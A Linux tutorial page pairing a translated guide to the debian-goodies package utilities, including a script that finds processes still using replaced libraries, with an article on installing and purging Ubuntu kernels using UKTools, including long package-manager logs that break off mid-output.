Network Break 182: BGP Hijacked For Cryptocurrency Heist; Juniper, Big Switch Unveil New Products
Today's Network Break delves into a BGP hijack, looks at new products from Juniper and Big Switch, discusses why bpfilter is replacing iptables in the Linux kernel, and reviews even more tech news.
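A Set of Useful Utilities for Debian and Ubuntu Users

Are you using a Debian-based system? If so, great! I have good news for you today. Say hello to "Debian-goodies", a collection of useful utilities for Debian-based systems such as Ubuntu and Linux Mint. These utilities provide some additional useful commands that are not available by default on Debian-based systems. Using these tools, users can find out which programs consume the most disk space, which services need to be restarted after a system update, search for files matching a pattern within a package, list installed packages that match a search string, and more. In this brief guide, we will discuss some of the useful Debian goodies.

Debian-goodies – Useful utilities for Debian and Ubuntu users

The debian-goodies package is available in the official repositories of Debian and its derivative Ubuntu, as well as other Ubuntu variants such as Linux Mint. To install debian-goodies, simply run: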

$ sudo apt-get install debian-goodies

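Once debian-goodies is installed, let us take a look at some of the useful utilities.

1. checkrestart

Let me start with my favorite, the checkrestart utility. When you install security updates, some running applications may still be using the old libraries. To apply the security updates completely, you need to find and restart all of them. This is where checkrestart comes in handy. The utility finds which processes are still using old versions of libraries, so that you can then restart the services.

To check which daemons should be restarted after a library update, run: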

$ sudo checkrestart
[sudo] password for sk:
Found 0 processes using old versions of upgraded files

Since I have not performed any security updates recently, it shows nothing.
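The condition checkrestart reports can also be observed by hand: when a package upgrade replaces a library file, processes that loaded the old copy keep it mapped, and the kernel marks that mapping with a "(deleted)" suffix in /proc/<pid>/maps. The script below is an added example, not code from checkrestart or needrestart; the function names (stale_maps, scan_procs, make_sample_proc), the noise filter, and the sample maps files are constructed here for illustration.

```shell
#!/bin/sh
# Added example: list processes that still execute code from files that
# have been replaced on disk (shown as "(deleted)" in /proc/<pid>/maps).

# stale_maps: read maps-format text on stdin and print, once each, the
# path of every deleted, file-backed, executable mapping.
stale_maps() {
    awk '
        # Fields: address-range perms offset dev inode pathname
        $2 ~ /x/ && $5 != 0 && / \(deleted\)$/ {
            path = substr($0, index($0, "/"))
            sub(/ \(deleted\)$/, "", path)
            # Shared-memory and scratch files are routinely unlinked while
            # mapped and say nothing about pending upgrades (assumed list).
            if (path ~ "^/(memfd:|SYSV|dev/shm/|tmp/|run/)") next
            if (!seen[path]++) print path
        }'
}

# scan_procs [ROOT]: walk a /proc-style tree (default /proc) and print
# "pid<TAB>command<TAB>stale file" for every affected process.
scan_procs() {
    root=${1:-/proc}
    for d in "$root"/[0-9]*; do
        [ -r "$d/maps" ] || continue
        libs=$(stale_maps < "$d/maps" 2>/dev/null) || continue
        [ -n "$libs" ] || continue
        name=$(cat "$d/comm" 2>/dev/null || echo '?')
        printf '%s\n' "$libs" | while IFS= read -r lib; do
            printf '%s\t%s\t%s\n' "${d##*/}" "$name" "$lib"
        done
    done
    return 0
}

# make_sample_proc: build a constructed /proc-like tree with three
# processes and print its path. All contents are made up for the demo.
make_sample_proc() {
    dir=$(mktemp -d) || return 1
    mkdir "$dir/101" "$dir/202" "$dir/303"
    echo sshd > "$dir/101/comm"
    cat > "$dir/101/maps" <<'EOF'
55d0a0000000-55d0a00c0000 r-xp 00000000 08:01 131201 /usr/sbin/sshd
7f10a0000000-7f10a0022000 r--p 00000000 08:01 262301 /lib/x86_64-linux-gnu/libc-2.27.so (deleted)
7f10a0022000-7f10a01e7000 r-xp 00022000 08:01 262301 /lib/x86_64-linux-gnu/libc-2.27.so (deleted)
7f10a0400000-7f10a0680000 r-xp 00000000 08:01 262377 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1 (deleted)
7ffd10000000-7ffd10021000 rw-p 00000000 00:00 0 [stack]
EOF
    echo Xorg > "$dir/202/comm"
    cat > "$dir/202/maps" <<'EOF'
55e000000000-55e000240000 r-xp 00000000 08:01 131555 /usr/bin/Xorg
7f2000000000-7f2000001000 rw-s 00000000 00:05 9001 /memfd:xshmfence (deleted)
7f2000100000-7f2000200000 r-xp 00000000 00:19 9002 /dev/shm/jit-cache (deleted)
EOF
    echo cron > "$dir/303/comm"
    cat > "$dir/303/maps" <<'EOF'
55f000000000-55f00000b000 r-xp 00000000 08:01 131777 /usr/sbin/cron
7f3000000000-7f30001e7000 r-xp 00000000 08:01 262999 /lib/x86_64-linux-gnu/libc-2.27.so
EOF
    printf '%s\n' "$dir"
}

# Demo on the constructed tree: only the sshd process is reported.
sample=$(make_sample_proc)
scan_procs "$sample"
rm -rf "$sample"
```

On a real host, calling `scan_procs` with no argument as root reads the live /proc; without root, only your own processes' maps are readable.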

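Note that the checkrestart utility does work well. However, a similar, newer tool named needrestart is available on the latest Debian systems. needrestart is inspired by the checkrestart utility and does the same job. needrestart is actively maintained and supports newer technologies such as containers (LXC, Docker).

Here are the features of needrestart:

  • Supports (but does not require) systemd
  • Binary blacklisting (for example, display managers for graphical displays)
  • Tries to detect pending kernel upgrades
  • Tries to detect required restarts of interpreter-based daemons (supports Perl, Python, Ruby)
  • Fully integrated into apt/dpkg using hooks

It is also available in the default repositories. So you can install it with the following command: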

$ sudo apt-get install needrestart

Now you can check the list of daemons that need to be restarted after a system update with the following command:

$ sudo needrestart
Scanning processes...
Scanning linux images...

Running kernel seems to be up-to-date.

Failed to check for processor microcode upgrades.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

The good news is that needrestart works on other Linux distributions as well. For example, on Arch Linux and its derivatives you can install it from the AUR using any AUR helper, like this:

$ yaourt -S needrestart

On Fedora:

$ sudo dnf install needrestart

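2. check-enhancements

The check-enhancements utility finds packages that enhance installed packages. It lists packages that enhance other packages but are not strictly required to run them. You can find enhancements for a single package, or for all installed packages with the -ip or --installed-packages option.

For example, I am going to list the packages that enhance the gimp package: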

$ check-enhancements gimp
gimp => gimp-data: Installed: (none) Candidate: 2.8.22-1
gimp => gimp-gmic: Installed: (none) Candidate: 1.7.9+zart-4build3
gimp => gimp-gutenprint: Installed: (none) Candidate: 5.2.13-2
gimp => gimp-help-ca: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-de: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-el: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-en: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-es: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-fr: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-it: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-ja: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-ko: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-nl: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-nn: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-pt: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-ru: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-sl: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-help-sv: Installed: (none) Candidate: 2.8.2-0.1
gimp => gimp-plugin-registry: Installed: (none) Candidate: 7.20140602ubuntu3
gimp => xcftools: Installed: (none) Candidate: 1.0.7-6

To list enhancements for all installed packages, run:

$ check-enhancements -ip
autoconf => autoconf-archive: Installed: (none) Candidate: 20170928-2
btrfs-progs => snapper: Installed: (none) Candidate: 0.5.4-3
ca-certificates => ca-cacert: Installed: (none) Candidate: 2011.0523-2
cryptsetup => mandos-client: Installed: (none) Candidate: 1.7.19-1
dpkg => debsig-verify: Installed: (none) Candidate: 0.18
[...]

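3. dgrep

As the name implies, dgrep searches all files of the specified packages for a given regular expression. For example, I am going to search the Vim package for files that contain the regular expression "text".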

$ sudo dgrep "text" vim
Binary file /usr/bin/vim.tiny matches
/usr/share/doc/vim-tiny/copyright: that they must include this license text. You can also distribute
/usr/share/doc/vim-tiny/copyright: include this license text. You are also allowed to include executables
/usr/share/doc/vim-tiny/copyright: 1) This license text must be included unmodified.
/usr/share/doc/vim-tiny/copyright: text under a) applies to those changes.
/usr/share/doc/vim-tiny/copyright: context diff. You can choose what license to use for new code you
/usr/share/doc/vim-tiny/copyright: context diff will do. The e-mail address to be used is
/usr/share/doc/vim-tiny/copyright: On Debian systems, the complete text of the GPL version 2 license can be
[...]

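dgrep supports most of grep's options.

4. dglob

The dglob utility generates a list of package names that match a given pattern. For example, to find the list of packages that match the string "vim":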

$ sudo dglob vim
vim-tiny:amd64
vim:amd64
vim-common:all
vim-runtime:all

By default, dglob displays only installed packages. To list all packages (both installed and not installed), use the -a flag.

$ sudo dglob vim -a

5. debget

The debget utility downloads the .deb file of a package in APT's database. Note that it downloads only the given package, not its dependencies.

$ debget nano
Get:1 http://in.archive.ubuntu.com/ubuntu bionic/main amd64 nano amd64 2.9.3-2 [231 kB]
Fetched 231 kB in 2s (113 kB/s)

6. dpigs

This is another useful utility in this collection. The dpigs utility finds and shows which installed packages occupy the most disk space.

$ dpigs
260644 linux-firmware
167195 linux-modules-extra-4.15.0-20-generic
75186 linux-headers-4.15.0-20
64217 linux-modules-4.15.0-20-generic
55620 snapd
31376 git
31070 libicu60
28420 vim-runtime
25971 gcc-7
24349 g++-7

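As you can see, the linux-firmware package takes up the most disk space. By default, it displays the top 10 packages by disk usage. To display more packages, for example 20, run the following command: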

$ dpigs -n 20

7. debman

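The debman utility lets you easily view man pages from a binary .deb file without extracting it. You do not even need to install the .deb package. The following command displays the man page of the nano package.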

$ debman -f nano_2.9.3-2_amd64.deb nano

If you do not have a local copy of the .deb package, use the -p flag to download the package and view its man page.

$ debman -p nano nano

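8. debmany

An installed Debian package contains not only man pages but also other files such as acknowledgements, copyright, and README files. The debmany utility lets you view and read those files.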

$ debmany vim

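Use the arrow keys to choose the file you want to view, then press Enter to view the selected file. Press q to return to the main menu.

If the specified package is not installed, debmany downloads it from the APT database and displays the man pages. The dialog package should be installed to read the man pages.

9. popbugs

If you are a developer, the popbugs utility will be quite useful. It displays a customized list of release-critical bugs based on the packages you use (using popularity-contest data). For those unfamiliar with it, the popularity-contest package sets up a cron job that periodically and anonymously submits statistics about the most-used Debian packages on the system to the Debian developers. This information helps Debian make decisions such as which packages should go on the first CD. It also lets Debian improve future releases so that the most popular packages are installed automatically for new users.

To generate the list of critical bugs and display the result in your default web browser, run: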

$ popbugs

You can also save the result to a file, as shown below.

$ popbugs --output=bugs.txt

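10. which-pkg-broke

This command displays all the dependencies of the given package and when each dependency was installed. Using this information, you can easily find which package might have broken another one, and when, after upgrading the system or a package.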

$ which-pkg-broke vim
Package <debconf-2.0> has no install time info
debconf Wed Apr 25 08:08:40 2018
gcc-8-base:amd64 Wed Apr 25 08:08:41 2018
libacl1:amd64 Wed Apr 25 08:08:41 2018
libattr1:amd64 Wed Apr 25 08:08:41 2018
dpkg Wed Apr 25 08:08:41 2018
libbz2-1.0:amd64 Wed Apr 25 08:08:41 2018
libc6:amd64 Wed Apr 25 08:08:42 2018
libgcc1:amd64 Wed Apr 25 08:08:42 2018
liblzma5:amd64 Wed Apr 25 08:08:42 2018
libdb5.3:amd64 Wed Apr 25 08:08:42 2018
[...]

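11. dhomepage

The dhomepage utility displays the official website of the given package in your default web browser. For example, the following command opens the home page of the Vim editor.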

$ dhomepage vim

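That is all. Debian-goodies is a must-have in your arsenal. Even if we do not use all of these utilities often, they are worth learning about, and I am sure they will come in handy at times.

I hope this was useful. More good stuff to come. Stay tuned!

Cheers!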


via: https://www.ostechnix.com/debian-goodies-a-set-of-useful-utilities-for-debian-and-ubuntu-users/

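Author: SK; Topic selection: lujun9972; Translator: MjSeven; Proofreader: wxy

This article was originally compiled by LCTT and is proudly presented by Linux中国 (Linux China).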


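UKTools: An Easy Way to Install the Latest Linux Kernel

There are many utilities for Ubuntu that upgrade the Linux kernel to the latest stable version. We have written about such utilities before, for example Linux Kernel Utilities (LKU), Ubuntu Kernel Upgrade Utility (UKUU), and Ubunsys.

A few other utilities are available as well. We plan to cover them in other articles, for example ubuntu-mainline-kernel.sh and the manual way of installing from the mainline kernel.

Today we will show you a similar tool, UKTools. You can try any of these utilities to upgrade the Linux kernel to the latest version.

The latest kernel releases come with security fixes and some improvements, so it is better to stay on the latest kernel version to get reliability, security, and better hardware performance.

Sometimes the latest kernel version may have bugs and crash your system; that is at your own risk. I advise you not to install it in production environments.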

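What is UKTools

UKTools stands for Ubuntu Kernel Tools. It contains two shell scripts, ukupgrade and ukpurge.

ukupgrade stands for "Ubuntu Kernel Upgrade". It lets users upgrade the Linux kernel to the latest stable version for Ubuntu/Mint and derivatives, based on kernel.ubuntu.com.

ukpurge stands for "Ubuntu Kernel Purge". It lets users remove old Linux kernel images and headers from the machine, for Ubuntu/Mint and derivatives. It keeps only three kernel versions.

This utility has no GUI, but it looks very simple and straightforward, so a newcomer can perform the upgrade without any trouble.

I am running Ubuntu 17.10, and the current kernel version is as follows: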

$ uname -a
Linux ubuntu 4.13.0-39-generic #44-Ubuntu SMP Thu Apr 5 14:25:01 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Run the following command to get the list of kernels installed on the system (Ubuntu and its derivatives). I currently have 7 kernels.

$ dpkg --list | grep linux-image
ii linux-image-4.13.0-16-generic 4.13.0-16.19 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-17-generic 4.13.0-17.20 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-32-generic 4.13.0-32.35 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-36-generic 4.13.0-36.40 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-37-generic 4.13.0-37.42 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-16-generic 4.13.0-16.19 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-17-generic 4.13.0-17.20 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-32-generic 4.13.0-32.35 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-36-generic 4.13.0-36.40 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-37-generic 4.13.0-37.42 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-38-generic 4.13.0-38.43 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-extra-4.13.0-39-generic 4.13.0-39.44 amd64 Linux kernel extra modules for version 4.13.0 on 64 bit x86 SMP
ii linux-image-generic 4.13.0.39.42 amd64 Generic Linux kernel image

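How to install UKTools

On Ubuntu and its derivatives, simply run the following commands to install UKTools.

Run the following command on your system to clone the UKTools repository: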

$ git clone https://github.com/usbkey9/uktools

Change into the uktools directory:

$ cd uktools

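Run the Makefile to generate the necessary files. This will also automatically install the latest available kernel. Simply reboot the system to use the latest kernel.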

$ sudo make
[sudo] password for daygeek:
Creating the directories if neccessary
Linking profile.d file for reboot message
Linking files to global sbin directory
Ubuntu Kernel Upgrade - by Mustafa Hasturk
------------------------------------------
This script is based on the work of Mustafa Hasturk and was reworked by
Caio Oliveira and modified and fixed by Christoph Kepler

Current Development and Maintenance by Christoph Kepler

Do you want the Stable Release (if not sure, press y)? (y/n): y
Do you want the Generic kernel? (y/n): y
Do you want to autoremove old kernel? (y/n): y
no crontab for root
Do you want to update the kernel automatically? (y/n): y
Setup complete. Update the kernel right now? (y/n): y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
 linux-headers-4.13.0-16 linux-headers-4.13.0-16-generic linux-headers-4.13.0-17 linux-headers-4.13.0-17-generic linux-headers-4.13.0-32 linux-headers-4.13.0-32-generic linux-headers-4.13.0-36
 linux-headers-4.13.0-36-generic linux-headers-4.13.0-37 linux-headers-4.13.0-37-generic linux-image-4.13.0-16-generic linux-image-4.13.0-17-generic linux-image-4.13.0-32-generic linux-image-4.13.0-36-generic
 linux-image-4.13.0-37-generic linux-image-extra-4.13.0-16-generic linux-image-extra-4.13.0-17-generic linux-image-extra-4.13.0-32-generic linux-image-extra-4.13.0-36-generic
 linux-image-extra-4.13.0-37-generic
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
 lynx-common
The following NEW packages will be installed:
 lynx lynx-common
0 upgraded, 2 newly installed, 0 to remove and 71 not upgraded.
Need to get 1,498 kB of archives.
After this operation, 5,418 kB of additional disk space will be used.
Get:1 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 lynx-common all 2.8.9dev16-1 [873 kB]
Get:2 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 lynx amd64 2.8.9dev16-1 [625 kB]
Fetched 1,498 kB in 12s (120 kB/s)
Selecting previously unselected package lynx-common.
(Reading database ... 441037 files and directories currently installed.)
Preparing to unpack .../lynx-common_2.8.9dev16-1_all.deb ...
Unpacking lynx-common (2.8.9dev16-1) ...
Selecting previously unselected package lynx.
Preparing to unpack .../lynx_2.8.9dev16-1_amd64.deb ...
Unpacking lynx (2.8.9dev16-1) ...
Processing triggers for mime-support (3.60ubuntu1) ...
Processing triggers for doc-base (0.10.7) ...
Processing 1 added doc-base file...
Processing triggers for man-db (2.7.6.1-2) ...
Setting up lynx-common (2.8.9dev16-1) ...
Setting up lynx (2.8.9dev16-1) ...
update-alternatives: using /usr/bin/lynx to provide /usr/bin/www-browser (www-browser) in auto mode

Cleaning old downloads in /tmp

Downloading the kernel's components...
Checksum for linux-headers-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb succeed
Checksum for linux-image-unsigned-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb succeed
Checksum for linux-modules-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb succeed

Downloading the shared kernel header...
Checksum for linux-headers-4.16.7-041607_4.16.7-041607.201805021131_all.deb succeed

Installing Kernel and Headers...
Selecting previously unselected package linux-headers-4.16.7-041607.
(Reading database ... 441141 files and directories currently installed.)
Preparing to unpack .../linux-headers-4.16.7-041607_4.16.7-041607.201805021131_all.deb ...
Unpacking linux-headers-4.16.7-041607 (4.16.7-041607.201805021131) ...
Selecting previously unselected package linux-headers-4.16.7-041607-generic.
Preparing to unpack .../linux-headers-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb ...
Unpacking linux-headers-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Selecting previously unselected package linux-image-unsigned-4.16.7-041607-generic.
Preparing to unpack .../linux-image-unsigned-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb ...
Unpacking linux-image-unsigned-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Selecting previously unselected package linux-modules-4.16.7-041607-generic.
Preparing to unpack .../linux-modules-4.16.7-041607-generic_4.16.7-041607.201805021131_amd64.deb ...
Unpacking linux-modules-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Setting up linux-headers-4.16.7-041607 (4.16.7-041607.201805021131) ...
dpkg: dependency problems prevent configuration of linux-headers-4.16.7-041607-generic:
 linux-headers-4.16.7-041607-generic depends on libssl1.1 (>= 1.1.0); however:
 Package libssl1.1 is not installed.

Setting up linux-modules-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
Setting up linux-image-unsigned-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
I: /vmlinuz.old is now a symlink to boot/vmlinuz-4.13.0-39-generic
I: /initrd.img.old is now a symlink to boot/initrd.img-4.13.0-39-generic
I: /vmlinuz is now a symlink to boot/vmlinuz-4.16.7-041607-generic
I: /initrd.img is now a symlink to boot/initrd.img-4.16.7-041607-generic
Processing triggers for linux-image-unsigned-4.16.7-041607-generic (4.16.7-041607.201805021131) ...
/etc/kernel/postinst.d/initramfs-tools:
update-initramfs: Generating /boot/initrd.img-4.16.7-041607-generic
/etc/kernel/postinst.d/zz-update-grub:
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found linux image: /boot/vmlinuz-4.13.0-36-generic
Found initrd image: /boot/initrd.img-4.13.0-36-generic
Found linux image: /boot/vmlinuz-4.13.0-32-generic
Found initrd image: /boot/initrd.img-4.13.0-32-generic
Found linux image: /boot/vmlinuz-4.13.0-17-generic
Found initrd image: /boot/initrd.img-4.13.0-17-generic
Found linux image: /boot/vmlinuz-4.13.0-16-generic
Found initrd image: /boot/initrd.img-4.13.0-16-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done

Thanks for using this script! Hope it helped.
Give it a star: https://github.com/MarauderXtreme/uktools

Reboot the system to activate the latest kernel.

$ sudo shutdown -r now

Once the system has rebooted, check the kernel version again.

$ uname -a
Linux ubuntu 4.16.7-041607-generic #201805021131 SMP Wed May 2 15:34:55 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

The make command places the following files in the /usr/local/bin directory.

do-kernel-upgrade
do-kernel-purge

To remove old kernels, run the following command:

$ do-kernel-purge

Ubuntu Kernel Purge - by Caio Oliveira

This script will only keep three versions: the first and the last two, others will be purge

---Current version:
Linux Kernel 4.16.7-041607 Generic (linux-image-4.16.7-041607-generic)

---Versions to remove:
4.13.0-16
4.13.0-17
4.13.0-32
4.13.0-36
4.13.0-37

---Do you want to remove the old kernels/headers versions? (Y/n): y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
 linux-headers-4.13.0-17 linux-headers-4.13.0-17-generic linux-headers-4.13.0-32 linux-headers-4.13.0-32-generic linux-headers-4.13.0-36 linux-headers-4.13.0-36-generic linux-headers-4.13.0-37
 linux-headers-4.13.0-37-generic linux-image-4.13.0-17-generic linux-image-4.13.0-32-generic linux-image-4.13.0-36-generic linux-image-4.13.0-37-generic linux-image-extra-4.13.0-17-generic
 linux-image-extra-4.13.0-32-generic linux-image-extra-4.13.0-36-generic linux-image-extra-4.13.0-37-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
 linux-headers-4.13.0-16* linux-headers-4.13.0-16-generic* linux-image-4.13.0-16-generic* linux-image-extra-4.13.0-16-generic*
0 upgraded, 0 newly installed, 4 to remove and 71 not upgraded.
After this operation, 318 MB disk space will be freed.
(Reading database ... 465582 files and directories currently installed.)
Removing linux-headers-4.13.0-16-generic (4.13.0-16.19) ...
Removing linux-headers-4.13.0-16 (4.13.0-16.19) ...
Removing linux-image-extra-4.13.0-16-generic (4.13.0-16.19) ...
run-parts: executing /etc/kernel/postinst.d/apt-auto-removal 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
update-initramfs: Generating /boot/initrd.img-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/unattended-upgrades 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/update-notifier 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found linux image: /boot/vmlinuz-4.13.0-36-generic
Found initrd image: /boot/initrd.img-4.13.0-36-generic
Found linux image: /boot/vmlinuz-4.13.0-32-generic
Found initrd image: /boot/initrd.img-4.13.0-32-generic
Found linux image: /boot/vmlinuz-4.13.0-17-generic
Found initrd image: /boot/initrd.img-4.13.0-17-generic
Found linux image: /boot/vmlinuz-4.13.0-16-generic
Found initrd image: /boot/initrd.img-4.13.0-16-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done
Removing linux-image-4.13.0-16-generic (4.13.0-16.19) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
update-initramfs: Deleting /boot/initrd.img-4.13.0-16-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found linux image: /boot/vmlinuz-4.13.0-36-generic
Found initrd image: /boot/initrd.img-4.13.0-36-generic
Found linux image: /boot/vmlinuz-4.13.0-32-generic
Found initrd image: /boot/initrd.img-4.13.0-32-generic
Found linux image: /boot/vmlinuz-4.13.0-17-generic
Found initrd image: /boot/initrd.img-4.13.0-17-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done
(Reading database ... 430635 files and directories currently installed.)
Purging configuration files for linux-image-extra-4.13.0-16-generic (4.13.0-16.19) ...
Purging configuration files for linux-image-4.13.0-16-generic (4.13.0-16.19) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-16-generic /boot/vmlinuz-4.13.0-16-generic
Reading package lists... Done
Building dependency tree
Reading state information... Done
.
.
.
.
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be REMOVED:
 linux-headers-4.13.0-37* linux-headers-4.13.0-37-generic* linux-image-4.13.0-37-generic* linux-image-extra-4.13.0-37-generic*
0 upgraded, 0 newly installed, 4 to remove and 71 not upgraded.
After this operation, 321 MB disk space will be freed.
(Reading database ... 325772 files and directories currently installed.)
Removing linux-headers-4.13.0-37-generic (4.13.0-37.42) ...
Removing linux-headers-4.13.0-37 (4.13.0-37.42) ...
Removing linux-image-extra-4.13.0-37-generic (4.13.0-37.42) ...
run-parts: executing /etc/kernel/postinst.d/apt-auto-removal 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
update-initramfs: Generating /boot/initrd.img-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/unattended-upgrades 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/update-notifier 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found linux image: /boot/vmlinuz-4.13.0-37-generic
Found initrd image: /boot/initrd.img-4.13.0-37-generic
Found memtest86+ image: /boot/memtest86+.elf
Found memtest86+ image: /boot/memtest86+.bin
done
Removing linux-image-4.13.0-37-generic (4.13.0-37.42) ...
Examining /etc/kernel/postrm.d .
run-parts: executing /etc/kernel/postrm.d/initramfs-tools 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
update-initramfs: Deleting /boot/initrd.img-4.13.0-37-generic
run-parts: executing /etc/kernel/postrm.d/zz-update-grub 4.13.0-37-generic /boot/vmlinuz-4.13.0-37-generic
Generating grub configuration file ...
Warning: Setting GRUB_TIMEOUT to a non-zero value when GRUB_HIDDEN_TIMEOUT is set is no longer supported.
Found linux image: /boot/vmlinuz-4.16.7-041607-generic
Found initrd image: /boot/initrd.img-4.16.7-041607-generic
Found linux image: /boot/vmlinuz-4.13.0-39-generic
Found initrd image: /boot/initrd.img-4.13.0-39-generic
Found linux image: /boot/vmlinuz-4.13.0-38-generic
Found initrd image: /boot/initrd.img-4.13.0-38-generic
Found memtest86+ image: /boot/memtest86+.elf
